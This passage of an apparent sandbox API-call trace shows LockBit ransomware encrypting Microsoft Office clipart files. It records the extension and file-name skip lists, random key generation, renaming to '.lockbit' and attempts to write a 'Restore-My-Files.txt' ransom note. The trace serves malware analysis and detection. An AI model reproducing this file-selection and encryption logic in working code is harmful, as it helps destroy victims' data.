ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.267] malloc (_Size=0x40068) returned 0x3d70450 [0177.267] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=24556) returned 1 [0177.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.268] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.272] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.272] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.274] free (_Block=0x1fa2ed8) [0177.274] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.274] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.274] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.274] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7f4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02790_.WMF", cAlternateFileName="")) returned 1 [0177.274] lstrcmpiW (lpString1=".", lpString2="SO02790_.WMF") returned -1 [0177.274] lstrcmpiW (lpString1="..", lpString2="SO02790_.WMF") returned -1 [0177.274] PathFindExtensionW (pszPath="SO02790_.WMF") returned=".WMF" [0177.274] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.274] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.275] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.275] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02790_.WMF") returned -1 [0177.276] lstrcmpiW (lpString1="ntldr", lpString2="SO02790_.WMF") returned -1 [0177.276] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02790_.WMF") returned -1 [0177.276] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02790_.WMF") returned -1 [0177.276] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02790_.WMF") returned -1 [0177.276] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02790_.WMF") returned 1 [0177.276] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02790_.WMF") returned -1 [0177.276] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.276] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF") returned=".WMF" [0177.276] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.276] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.276] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.277] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.278] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.278] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF.lockbit") returned 72 [0177.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02790_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.279] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.279] malloc (_Size=0x40068) returned 0x3f70048 [0177.279] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=32590) returned 1 [0177.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0177.280] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0177.280] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0177.285] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.285] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.285] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.287] free (_Block=0x1fa2ed8) [0177.287] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.287] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.287] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x430c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02791_.WMF", cAlternateFileName="")) returned 1 [0177.287] lstrcmpiW (lpString1=".", lpString2="SO02791_.WMF") returned -1 [0177.287] lstrcmpiW (lpString1="..", lpString2="SO02791_.WMF") returned -1 [0177.287] PathFindExtensionW (pszPath="SO02791_.WMF") returned=".WMF" [0177.287] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.287] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.287] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.287] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.287] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.288] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.288] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.289] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02791_.WMF") returned -1 [0177.289] lstrcmpiW (lpString1="ntldr", lpString2="SO02791_.WMF") returned -1 [0177.289] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02791_.WMF") returned -1 [0177.289] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02791_.WMF") returned -1 [0177.289] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02791_.WMF") returned -1 [0177.290] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02791_.WMF") returned 1 [0177.290] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02791_.WMF") returned -1 [0177.290] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.290] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF") returned=".WMF" [0177.290] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.290] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.290] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.291] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.291] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF.lockbit") returned 72 [0177.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02791_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.292] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.292] malloc (_Size=0x40068) returned 0x3e70008 [0177.292] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17164) returned 1 [0177.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0177.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0177.294] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0177.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.299] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.299] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.300] free (_Block=0x1fa2ed8) [0177.300] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.300] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.300] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02793_.WMF", cAlternateFileName="")) returned 1 [0177.300] lstrcmpiW (lpString1=".", lpString2="SO02793_.WMF") returned -1 [0177.300] lstrcmpiW (lpString1="..", lpString2="SO02793_.WMF") returned -1 [0177.301] PathFindExtensionW (pszPath="SO02793_.WMF") returned=".WMF" [0177.301] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.301] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.302] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".sys", 